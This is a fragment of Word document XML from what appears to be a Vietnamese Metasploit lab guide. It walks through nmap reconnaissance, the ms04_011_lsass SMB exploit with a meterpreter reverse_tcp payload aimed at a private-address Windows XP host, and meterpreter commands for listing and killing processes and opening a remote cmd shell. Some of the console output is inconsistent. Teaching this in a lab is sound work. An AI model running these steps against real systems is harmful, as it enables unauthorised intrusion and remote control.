          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="5FC449B6" w14:paraId="00421263" w14:textId="78D4014F">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="5FC449B6" w14:paraId="62872D02" w14:textId="7F3109C4">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.060 ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="128A11C9" w14:paraId="3D36E08C" w14:textId="3FCB6CFB">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00E35E33" w:rsidP="00E35E33" w:rsidRDefault="00E35E33" w14:paraId="1C32A5F2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; sudo nmap -v -A 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00E35E33" w:rsidP="00E35E33" w:rsidRDefault="00E35E33" w14:paraId="56C5F538" w14:textId="0E6350E4">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6 &gt; ping 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="001D4050">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="128A11C9" w14:paraId="003CC339" w14:textId="78D4014F">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PING 192.168.1.10 (192.168.1.10) 56(84) bytes of data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="128A11C9" w14:paraId="20B3295C" w14:textId="7F3109C4">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>64 bytes from 192.168.1.10: icmp_seq=1 ttl=64 time=0.060 ms</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="128A11C9" w14:paraId="33DBCF35" w14:textId="1B542B07">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="065A3842" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn module exploit ứng với lỗi hệ thống. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="00524A95" w14:paraId="4E2CFBAA" w14:textId="230E1894">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sf</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">6 </w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>&gt; use windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="2EBF91BC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chọn payload và thiết lập tham số.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="06469F22" w14:textId="7A59ACEC">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Hlk19992358" w:id="41"/>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>windows/smb/ms04_011_lsass</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>) &gt; set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="5E5399EA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>PALOAD =&gt; win32_reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="4844998C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="0AC36D26" w14:textId="289113C7">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms04_011_lsass) &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00A2630D">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidR="001B7BD1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>RHOSTS 192</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="063F03C1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>RHOST =&gt; 192.168.1.110</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="3A7FB863" w14:textId="394B1FB2">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms04_011_lsass) &gt; set LHOST 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="50D18D6C" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>LHOST =&gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="122B51D0" w14:textId="7650C888">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms04_011_lsass) &gt; set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="22EE496B" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thực hiện khai thác lỗ hổng (exploit) để tấn công từ xa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="49611D1A" w14:paraId="2A8351D5" w14:textId="7DB46901">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit(windows/smb/ms04_011_lsass) &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="0AE7288E" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.1.10:4444 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="610B90B2" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] 192.168.1.110:445 - Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.1.110[\lsarpc]...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="13BAF6F3" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[-] 192.168.1.110:445 - Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="06A08C8A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>[*] Exploit completed, but no session was created.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="49611D1A" w14:paraId="583C4FD1" w14:textId="4A413BF7">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>msf6</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="3B9C5DF7">
        <w:t xml:space="preserve"> exploit(windows/smb/ms04_011_lsass) &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="35DFF694" w:rsidRDefault="3B9C5DF7" w14:paraId="1CCEDBEC" w14:textId="77777777">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Bước 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Xâm nhập hệ thống dựa trên meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="46D79BCA" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="588070EB" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; use -m P      //add thêm tập lệnh của process</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="5278CDB9" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; help &lt;          // xem các lệnh meterpreter hỗ trợ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="7F7910B0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; ps             // list các process mà remote machine đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="62823203" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; kill          // tắt các process mà remote machine đang chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="37C58385" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt;            // tấn công sử dụng comandline cmd của remote machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="2F534468" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> execute: success, process id is 3516.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="28742160" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> execute: allocated channel 1 for new process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="0A312051" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>meterpreter&gt; interact 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="19B17EFF" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> interact: Switching to interactive console on 1...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="4961BF9F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> interact: Started interactive channel 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="46011F70" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> Microsoft Windows XP [Version 5.1.2600]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="341FDC03" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> (C) Copyright 1985-2001 Microsoft Corp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="45482E24" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="7D1EE6C1" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> C:WINDOWS&gt;echo Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="2587657D" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> echo Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="564D2B20" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> Meterpreter interactive channel in action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="697C45BC" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="5F8C38B4" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>C:WINDOWS&gt;ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="21683173" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>Caught Ctrl-C, close interactive session? [y/N] y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="00A6227C" w:rsidRDefault="3B9C5DF7" w14:paraId="353DDD5F" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCourier"/>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:t>meterpreter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="008E3F20" w:rsidP="000634C0" w:rsidRDefault="3B9C5DF7" w14:paraId="21626220" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1729165151" w:id="42"/>
      <w:bookmarkStart w:name="_Toc145594634" w:id="43"/>
      <w:r w:rsidRPr="3CE16CD3">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>NOTE Các lệnh chính</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w:rsidR="008E3F20" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="565B2C95" w14:textId="13FADD68">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>use windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302933" w:rsidP="009F5AB1" w:rsidRDefault="00302933" w14:paraId="3D0362A0" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="004E399D" w:rsidP="009F5AB1" w:rsidRDefault="004E399D" w14:paraId="3E0CC4B7" w14:textId="47F5D544">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E399D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>use exploit/windows/smb/ms04_011_lsass</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="0041641A" w:rsidR="00046465" w:rsidP="009F5AB1" w:rsidRDefault="00046465" w14:paraId="3425F12B" w14:textId="0BBC0174">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/</w:t>
      </w:r>
      <w:r w:rsidR="00382063">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2630D" w:rsidP="009F5AB1" w:rsidRDefault="3B9C5DF7" w14:paraId="6A531352" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="txtCommand"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set RHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A" w:rsidR="00D0655D">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="0041641A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
